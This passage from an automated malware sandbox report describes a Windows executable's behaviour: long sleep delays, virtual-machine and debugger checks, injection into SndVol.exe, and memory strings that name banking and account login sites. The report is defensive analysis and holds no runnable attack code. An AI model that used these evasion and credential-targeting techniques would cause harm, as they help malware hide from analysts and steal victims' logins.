                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: ungziped_file.exe PID: 6292, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFD3122D324
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFD3122D7E4
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFD3122D944
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFD3122D504
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFD3122D544
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFD3122D1E4
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFD31230154
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFD3122DA44
                Source: C:\Users\user\Desktop\ungziped_file.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeMemory allocated: 2A00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeMemory allocated: 8C60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeMemory allocated: 9C60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeMemory allocated: 9E60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeMemory allocated: AE60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0122096E rdtsc 5_2_0122096E
                Source: C:\Users\user\Desktop\ungziped_file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4158Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 907Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 2774Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 7200Jump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\ungziped_file.exe TID: 6364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5080Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5080Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2524Thread sleep count: 2774 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2524Thread sleep time: -5548000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2524Thread sleep count: 7200 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2524Thread sleep time: -14400000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108Thread sleep time: -49500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108Thread sleep time: -32000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SndVol.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SndVol.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032BC7E0 FindFirstFileW,FindNextFileW,FindClose,16_2_032BC7E0
                Source: C:\Users\user\Desktop\ungziped_file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 31mF3HIk-.16.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 31mF3HIk-.16.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: 31mF3HIk-.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 31mF3HIk-.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 31mF3HIk-.16.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 31mF3HIk-.16.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: svchost.exe, 00000007.00000002.2868612649.0000023C0782B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: 31mF3HIk-.16.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: svchost.exe, 00000007.00000002.2869204656.0000023C08C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2868639197.0000023C07840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 31mF3HIk-.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 31mF3HIk-.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 31mF3HIk-.16.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 31mF3HIk-.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 31mF3HIk-.16.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 31mF3HIk-.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 31mF3HIk-.16.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: SndVol.exe, 00000010.00000002.3510287029.000000000353A000.00000004.00000020.00020000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3511776628.0000000001099000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000002.1703149829.000002690B3CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 31mF3HIk-.16.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: 31mF3HIk-.16.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: 31mF3HIk-.16.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: 31mF3HIk-.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 31mF3HIk-.16.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 31mF3HIk-.16.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 31mF3HIk-.16.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 31mF3HIk-.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 31mF3HIk-.16.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 31mF3HIk-.16.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 31mF3HIk-.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 31mF3HIk-.16.drBinary or memory string: global block list test formVMware20,11696501413
                Source: 31mF3HIk-.16.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: ungziped_file.exe, 00000000.00000002.1065145964.0000000000D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
                Source: 31mF3HIk-.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 31mF3HIk-.16.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 31mF3HIk-.16.drBinary or memory string: discord.comVMware20,11696501413f
                Source: 31mF3HIk-.16.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0122096E rdtsc 5_2_0122096E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00417D93 LdrLoadDll,5_2_00417D93
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01210124 mov eax, dword ptr fs:[00000030h]5_2_01210124
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128A118 mov ecx, dword ptr fs:[00000030h]5_2_0128A118
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128A118 mov eax, dword ptr fs:[00000030h]5_2_0128A118
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128A118 mov eax, dword ptr fs:[00000030h]5_2_0128A118
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128A118 mov eax, dword ptr fs:[00000030h]5_2_0128A118
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A0115 mov eax, dword ptr fs:[00000030h]5_2_012A0115
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E6154 mov eax, dword ptr fs:[00000030h]5_2_011E6154
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E6154 mov eax, dword ptr fs:[00000030h]5_2_011E6154
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DC156 mov eax, dword ptr fs:[00000030h]5_2_011DC156
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01274144 mov eax, dword ptr fs:[00000030h]5_2_01274144
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01274144 mov eax, dword ptr fs:[00000030h]5_2_01274144
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01274144 mov ecx, dword ptr fs:[00000030h]5_2_01274144
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01274144 mov eax, dword ptr fs:[00000030h]5_2_01274144
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01274144 mov eax, dword ptr fs:[00000030h]5_2_01274144
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01278158 mov eax, dword ptr fs:[00000030h]5_2_01278158
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DA197 mov eax, dword ptr fs:[00000030h]5_2_011DA197
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DA197 mov eax, dword ptr fs:[00000030h]5_2_011DA197
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DA197 mov eax, dword ptr fs:[00000030h]5_2_011DA197
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0129C188 mov eax, dword ptr fs:[00000030h]5_2_0129C188
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0129C188 mov eax, dword ptr fs:[00000030h]5_2_0129C188
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01220185 mov eax, dword ptr fs:[00000030h]5_2_01220185
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01284180 mov eax, dword ptr fs:[00000030h]5_2_01284180
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01284180 mov eax, dword ptr fs:[00000030h]5_2_01284180
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126019F mov eax, dword ptr fs:[00000030h]5_2_0126019F
